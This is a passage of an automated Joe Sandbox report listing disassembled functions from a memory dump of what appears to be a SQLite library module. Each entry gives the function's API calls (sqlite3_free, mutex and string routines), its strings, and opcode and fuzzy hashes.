Instruction ID: e72be7ca0d58fd5dbd21fc37a8c9529d6f4f9de40da00343ca88b402c8c0408b
Opcode Fuzzy Hash: 589ae2881a892b51e35cc4aace64d2022a654ae91323b965527d9d4b174b2909
Instruction Fuzzy Hash: 6A11E2B4A24A518FDB00EFB988A152477E5FB4734A725487AE66887301E730D4E18B92

Function 61E4A981 Relevance: 9.4, APIs: 6, Instructions: 387stringCOMMON

Download Yara Rule

APIs

sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E4B8AB), ref: 61E4AE23

Part of subcall function 61E0A11F: memcmp.MSVCRT ref: 61E0A217

strcmp.MSVCRT ref: 61E4ADF3
sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E4B8AB), ref: 61E4AE36
sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E4B8AB), ref: 61E4AE67
sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E4B8AB), ref: 61E4AE82
sqlite3_free.SQLITE3 ref: 61E4AE95

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free$memcmpsqlite3_logstrcmp
String ID:
API String ID: 3787749158-0
Opcode ID: 3fc2ca668de7e7954154ef3fd4a5c7c49bf420decd33f17f7bae957416c20ef4
Instruction ID: 2089d13e5144b134d9d43914b54e80e1454d36bfc7656655a81763ba800fb89a
Opcode Fuzzy Hash: 3fc2ca668de7e7954154ef3fd4a5c7c49bf420decd33f17f7bae957416c20ef4
Instruction Fuzzy Hash: FDF1F974A443498FDB10CFA8D58078DBBF1AF88328F24C429E85AEB355E774D886CB41

Function 61E16FCA Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E16FE4
sqlite3_msize.SQLITE3 ref: 61E1719E
sqlite3_msize.SQLITE3 ref: 61E171AC
sqlite3_msize.SQLITE3 ref: 61E171BA
sqlite3_msize.SQLITE3 ref: 61E171C8
sqlite3_mutex_leave.SQLITE3 ref: 61E17316

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
String ID:
API String ID: 2585109301-0
Opcode ID: e7f4a6946607e99e8a8888117b595769684914184309cf2972c609941d4f38c3
Instruction ID: 2b5e61ce1892de3f651a51c4c7228de1f5a9cbd3936fca0af214cb279bf387ee
Opcode Fuzzy Hash: e7f4a6946607e99e8a8888117b595769684914184309cf2972c609941d4f38c3
Instruction Fuzzy Hash: A4B104B5A096068FDB04CF69C48179AB7F1BF89704F29C569EC599B309D734E812CFA0

Function 61EAF800 Relevance: 9.2, APIs: 6, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f811c1ac5bfcce14b028858cb66119b785f8844eea6c356cbd1b7cde1c6cd9
Instruction ID: c21d7b734f2bf0d24b6a37bf810ddb5641996aa0fdad1913f8f31f68412a0e52
Opcode Fuzzy Hash: e0f811c1ac5bfcce14b028858cb66119b785f8844eea6c356cbd1b7cde1c6cd9
Instruction Fuzzy Hash: FF81CC71A056159FDB00DFB8CA8064EBBF5FB85758F28C429E894CB314E738E945CB92

Function 61E1FB9C Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

sqlite3_value_bytes.SQLITE3 ref: 61E1FBBE
sqlite3_value_text.SQLITE3 ref: 61E1FBEC
sqlite3_result_error.SQLITE3 ref: 61E1FC1A
sqlite3_value_text.SQLITE3 ref: 61E1FC6A
sqlite3_value_text.SQLITE3 ref: 61E1FC78
sqlite3_result_int.SQLITE3 ref: 61E1FCA8

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
String ID:
API String ID: 4226599549-0
Opcode ID: 0b6a8e2960162501fa058c0059873835a5cab12def1929fc905239d5f33edf78
Instruction ID: 995dac72ef0e27c6a26286bec59f5351af16e19acef05ad377f4c41adb01af5b
Opcode Fuzzy Hash: 0b6a8e2960162501fa058c0059873835a5cab12def1929fc905239d5f33edf78
Instruction Fuzzy Hash: 19318C709082458BDB04DFB9C4916ADBBF0AF89314F20C52DE8A49B388D738D945CFA5

Function 61E2A09E Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 61E2A2D0
sqlite3_result_text.SQLITE3 ref: 61E2A329
sqlite3_free.SQLITE3(?), ref: 61E2A34C

Strings

bua, xrefs: 61E2A266

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: memmovesqlite3_freesqlite3_result_text
String ID: bua
API String ID: 1253750518-3993766197
Opcode ID: be31f6dd2b525f0756478d43b02388056cf7bc9442fff5524928f0c1dcf5d669
Instruction ID: 1255d51e05253c1092e8e64eb543c7ffed72d272ae899a084df19f942be9cd56
Opcode Fuzzy Hash: be31f6dd2b525f0756478d43b02388056cf7bc9442fff5524928f0c1dcf5d669
Instruction Fuzzy Hash: 2CA1C275E04219DFDB00CFA8C990A9EBBF1BF88354F28C569E858AB355D735E841CB60

Function 61E881B4 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

invalid rootpage, xrefs: 61E88264, 61E88382
@, xrefs: 61E881C8
orphan index, xrefs: 61E8833E

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID:
String ID: @$invalid rootpage$orphan index
API String ID: 0-2399666622
Opcode ID: 603a1ae0daffc994903b8ee65a2e6ccd75c805a5f0804f46c607170c8a36a715
Instruction ID: e7acab306532eed34c0ec0ba64acbc53013204b40645d8ade1d63a0d32af1a65
Opcode Fuzzy Hash: 603a1ae0daffc994903b8ee65a2e6ccd75c805a5f0804f46c607170c8a36a715
Instruction Fuzzy Hash: D651E4706087818BEB95CFA9C490B1A7BE2BF86718F34C16DDC998B365C734D841DB91

Function 61E1253C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

sqlite3_strglob.SQLITE3 ref: 61E125A2
sqlite3_strglob.SQLITE3 ref: 61E125BC
sqlite3_strglob.SQLITE3 ref: 61E125EF

Strings

, xrefs: 61E12604
, xrefs: 61E12583

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_strglob
String ID: $
API String ID: 476814121-227171996
Opcode ID: 4a941c6f88c54947abea8bcd0e3c248d337a08756b1a454c7a90ab30c644a66b
Instruction ID: 9293d3c9c94166d8ccbbb7aac000a9285885888c393d21750a87497d5ab52ba6
Opcode Fuzzy Hash: 4a941c6f88c54947abea8bcd0e3c248d337a08756b1a454c7a90ab30c644a66b
Instruction Fuzzy Hash: 5E21D6A090C38356D7128BB98DD2359BEE4FFA7318F34C46DC4968A699E330D481D747

Function 61E29622 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

sqlite3_stricmp.SQLITE3 ref: 61E2966E
sqlite3_stricmp.SQLITE3 ref: 61E29681
sqlite3_stricmp.SQLITE3 ref: 61E29697

Strings

bua, xrefs: 61E296A0

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_stricmp
String ID: bua
API String ID: 912767213-3993766197
Opcode ID: a3888bf878e7bc905f9266cc152cbe188918b78d3c705861ffc08a1d7020c94b
Instruction ID: f180618b8c101bcd75c9c10a7cbaef4a9318265b5d8e0c514a0d5c9c7ad760a6
Opcode Fuzzy Hash: a3888bf878e7bc905f9266cc152cbe188918b78d3c705861ffc08a1d7020c94b
Instruction Fuzzy Hash: FF21607050D3A19BE7119F68C5A171A7AF4AFC975CF28D86DE8888B345E774C840CB52

Function 61E15ADA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E15EC9), ref: 61E15B08
sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E15EC9), ref: 61E15B5F
sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E15EC9), ref: 61E15B79
sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E15EC9), ref: 61E15BA0

Strings

,ea, xrefs: 61E15B00, 61E15B57, 61E15B71, 61E15B98

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave
String ID: ,ea
API String ID: 1477753154-3149854123
Opcode ID: 74ce7e342898b4edb72fef9a430936546e7fd11f1f7adbbcda350412227fbce2
Instruction ID: aee4368669dab96f41ee28c1ae844e7c6aba0304c9ed90ce9da43ba71e48451e
Opcode Fuzzy Hash: 74ce7e342898b4edb72fef9a430936546e7fd11f1f7adbbcda350412227fbce2
Instruction Fuzzy Hash: A8113D71B28A418FDB00EFE9C8E2A5577E5BB4731CB64443EE664C7304E770D8918B52

Function 61E213AB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

sqlite3_result_error_code.SQLITE3 ref: 61E213C3
sqlite3_result_text.SQLITE3 ref: 61E213E9
sqlite3_str_reset.SQLITE3 ref: 61E21413

Strings

bua, xrefs: 61E21400

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_result_error_codesqlite3_result_textsqlite3_str_reset
String ID: bua
API String ID: 2138706903-3993766197
Opcode ID: 0487fcef7fcf685978b52b7cce02001f859f750c9b7422a6f9fe8018044b19e0
Instruction ID: c3db1f1ef3703a381267105005b9707733a028e2e7dfe0d4c5e5bdff8c331a2d
Opcode Fuzzy Hash: 0487fcef7fcf685978b52b7cce02001f859f750c9b7422a6f9fe8018044b19e0
Instruction Fuzzy Hash: F8F0E7B05093859BC708EFA9C5A131BBFF5AF85248F25C86DD9894B356D33AC5808B92

Function 61E41F25 Relevance: 7.8, APIs: 5, Instructions: 275COMMON

Download Yara Rule

APIs

sqlite3_free.SQLITE3 ref: 61E42065

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_malloc64.SQLITE3 ref: 61E420F8
sqlite3_free.SQLITE3 ref: 61E422AC
sqlite3_free.SQLITE3 ref: 61E422B7
sqlite3_free.SQLITE3 ref: 61E422C2

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free$sqlite3_malloc64sqlite3_mutex_enter
String ID:
API String ID: 3222813361-0
Opcode ID: c7e2c8551e67602677226d0976f2150f06b72aeb29f48ab7a3f70117654c7ee6
Instruction ID: 1ebcfea727343ad3743f0a9e7f1b514d6e3bd518be4554ff603aaf3f56ce240c
Opcode Fuzzy Hash: c7e2c8551e67602677226d0976f2150f06b72aeb29f48ab7a3f70117654c7ee6
Instruction Fuzzy Hash: D1C1D374A0524A9FDB15CFA8E480B9DBBF1BF98308F20C429E465EB750EB34E955CB41

Function 61E5516A Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_mutex_leave.SQLITE3 ref: 61E55190
sqlite3_mutex_leave.SQLITE3 ref: 61E55321
sqlite3_mutex_free.SQLITE3 ref: 61E55330
sqlite3_free.SQLITE3 ref: 61E55347
sqlite3_free.SQLITE3 ref: 61E5534F

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
String ID:
API String ID: 2921195555-0
Opcode ID: 9c3ea1bc8c6ee696551cbdf1480bf8e5d0e7d6f4edb003c6e10654d499458a50
Instruction ID: e9244f10f69b68a9e4703e305f25a06c77b76e531bfac8e4cd2f9958a03d0fa4
Opcode Fuzzy Hash: 9c3ea1bc8c6ee696551cbdf1480bf8e5d0e7d6f4edb003c6e10654d499458a50
Instruction Fuzzy Hash: 26516D75A047428BDB50DFA9C480659BBF1BF84718F29C86DEC989F305D731E862CB91

Function 61E55067 Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 61E15474: sqlite3_mutex_try.SQLITE3(?,?,?,61E154F4), ref: 61E15414

sqlite3_mutex_enter.SQLITE3(?,?,?,61E551C7), ref: 61E550B3
sqlite3_mutex_free.SQLITE3(?,?,?,61E551C7), ref: 61E550F4
sqlite3_mutex_leave.SQLITE3(?,?,?,61E551C7), ref: 61E55104
sqlite3_free.SQLITE3(?,?,?,61E551C7), ref: 61E5515B

Part of subcall function 61E53E3A: sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,00000000,?,?,61E54C2D), ref: 61E53E65
Part of subcall function 61E53E3A: sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,00000000,?,?,61E54C2D), ref: 61E53F1D

sqlite3_free.SQLITE3(?,?,?,61E551C7), ref: 61E5513C

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
String ID:
API String ID: 1894464702-0
Opcode ID: 48fdef2ef17aac56ff7f9cae0f742426dfecd03e01bac6b574427a64395b01d7
Instruction ID: 0be501cbb624a19b566ca240dc253122275484130ce2813f2aef5101a20bf185
Opcode Fuzzy Hash: 48fdef2ef17aac56ff7f9cae0f742426dfecd03e01bac6b574427a64395b01d7
Instruction Fuzzy Hash: 7B312C74B046468BD794DFBAC5C061ABBF6AF85308F34C56DD8448B309E776D8928B81

Function 61E2D302 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

sqlite3_log.SQLITE3 ref: 61E2D330
sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E2D43D), ref: 61E2D344
sqlite3_mutex_leave.SQLITE3 ref: 61E2D366
sqlite3_log.SQLITE3 ref: 61E2D384

Part of subcall function 61E2A35B: sqlite3_str_vappendf.SQLITE3 ref: 61E2A3CC

sqlite3_mutex_leave.SQLITE3 ref: 61E2D3BA

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_entersqlite3_str_vappendf
String ID:
API String ID: 3058739898-0
Opcode ID: 14eeb3625ae00e5f31f9fd538bd1b7acf824881d8a5c38dad76e5ed6603202df
Instruction ID: 4d31f28eceef2c9b34a1d8352a1a4ac9b8d5672f871b581ada5c80bfb095ede7
Opcode Fuzzy Hash: 14eeb3625ae00e5f31f9fd538bd1b7acf824881d8a5c38dad76e5ed6603202df
Instruction Fuzzy Hash: 5231D179604A41CBD7009F68C4A078A7BE1FFC5318F29C4B9DE588F359E775D84287A1

Function 61E22A16 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

sqlite3_str_appendf.SQLITE3 ref: 61E22A76
sqlite3_str_append.SQLITE3 ref: 61E22AA9
sqlite3_str_appendall.SQLITE3 ref: 61E22AC3
sqlite3_str_append.SQLITE3 ref: 61E22ADB
sqlite3_str_appendall.SQLITE3 ref: 61E22AE7

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
